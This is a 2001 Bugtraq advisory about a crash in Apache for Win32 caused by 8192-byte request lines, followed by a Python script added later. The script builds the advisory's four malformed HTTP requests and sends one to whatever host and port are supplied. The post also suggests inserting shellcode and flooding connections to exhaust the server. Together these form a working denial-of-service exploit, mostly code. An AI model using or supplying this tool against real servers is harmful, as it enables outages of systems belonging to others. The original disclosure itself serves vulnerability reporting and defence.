[20200] in bugtraq
Apache Win32 8192 chars string bug
daemon@ATHENA.MIT.EDU (Auriemma Luigi)
Fri Apr 13 07:28:04 2001
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.WNT.4.33.0104121355310.676-100000@ect004>
Date: Thu, 12 Apr 2001 13:56:49 +0200
Reply-To: Auriemma Luigi <kaino3@GENIE.IT>
From: Auriemma Luigi <kaino3@GENIE.IT>
To: BUGTRAQ@SECURITYFOCUS.COM
Credits: Auriemma Luigi <kaino3@genie.it>
I have found a little bug in some versions of the Apache web server for
Win32.
I have tested 1.3.14 and 1.3.15 (default installation) on Win98SE and
Win2k SP1, and they are vulnerable; today I tested an Apache 1.3.9 with
ApacheJServ/1.0 and it doesn't work (Access Forbidden); probably it wants a
string that is a bit longer or shorter.
The bug consists in sending a string of 8192 chars: (HTTP command) <space>
string 0d 0a.
The string is 8190 bytes long; the last 2 bytes are the carriage return and
line feed (0d 0a).
If anyone sends this string, Apache shows an error to the administrator and
leaves the connection alive and idle until the administrator closes the crash
window that appears. And if we add 100 other 8192-char strings (for
example Accept: (8182 of "A")), the range of memory occupied by the string
is bigger. On Windows 98, if someone sends 2 or more strings from different
connections, we get only one crash, but all the connections stay idle; instead
on Win NT/2000 we get all the crashes and all the connections idle. I
think that someone can use this bug in 2 or more ways:
1) Insert a shellcode in the string
2) Open a lot of connections with the 8192-char string to saturate all
resources
Some examples:
1) GET (8184 of "/") /
2) HEAD /(8182 of "A") /
3) GET (8184 of "/") /
   for 100 times:
   Accept: (8182 of "/")
4) GET (8177 of "/") HTTP/1.0
5) All your fantasy!
Thanks for your attention.
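A small generator for the request lines described in the post above, added here as an example and not part of the original message: it derives the fill counts quoted in the post (8184, 8182, 8177) from the "8190 bytes plus 0d 0a" rule instead of hard-coding them, so each generated line can be checked to be exactly 8192 bytes. The probe function's host and port are assumptions supplied by the caller, and the empty line that terminates example 3 is also an assumption; the post does not show one.

```python
import socket
import sys
from typing import Optional

# Line length described in the post: 8190 bytes of payload followed by
# CR LF, 8192 bytes in total. The post does not name the Apache constant,
# so only the observed length is used here.
LINE_LEN = 8192
CRLF = b"\r\n"


def fill_count(prefix: bytes, suffix: bytes = b"") -> int:
    """Number of fill bytes needed so prefix + fill + suffix + CRLF is 8192."""
    n = LINE_LEN - len(CRLF) - len(prefix) - len(suffix)
    if n < 0:
        raise ValueError("prefix/suffix too long for an 8192-byte line")
    return n


def pad_line(prefix: bytes, fill: bytes, suffix: bytes = b"") -> bytes:
    """Build one 8192-byte line in the shape the post describes."""
    line = prefix + fill * fill_count(prefix, suffix) + suffix + CRLF
    assert len(line) == LINE_LEN
    return line


def example_1() -> bytes:
    # GET (8184 of "/") /
    return pad_line(b"GET ", b"/", b" /")


def example_2() -> bytes:
    # HEAD /(8182 of "A") /
    return pad_line(b"HEAD /", b"A", b" /")


def example_3() -> bytes:
    # GET (8184 of "/") / followed by 100 lines of Accept: (8182 of "/")
    req = pad_line(b"GET ", b"/", b" /")
    for _ in range(100):
        req += pad_line(b"Accept: ", b"/")
    # Assumption: terminate the header block with an empty line; the post
    # does not show whether it did.
    return req + CRLF


def example_4() -> bytes:
    # GET (8177 of "/") HTTP/1.0
    return pad_line(b"GET ", b"/", b" HTTP/1.0")


def send_probe(host: str, port: int, payload: bytes,
               timeout: float = 5.0) -> Optional[bytes]:
    """Send one payload and return the first response bytes, or None.

    The post reports the connection being left idle once the crash window
    appears, so a read timeout with no response is the symptom to look for.
    host and port are assumptions supplied by the caller.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        try:
            return s.recv(4096)
        except socket.timeout:
            return None


if __name__ == "__main__":
    for name, payload in [("1", example_1()), ("2", example_2()),
                          ("3", example_3()), ("4", example_4())]:
        print(f"example {name}: {len(payload)} bytes")
    # Only talk to a server when host and port are given explicitly.
    if len(sys.argv) == 3:
        resp = send_probe(sys.argv[1], int(sys.argv[2]), example_1())
        print("no response (connection idle)" if resp is None else resp[:80])
```

Run without arguments it only builds the four payloads and prints their sizes; pass a host and port to send example 1 and see whether the server answers or goes idle as the post describes.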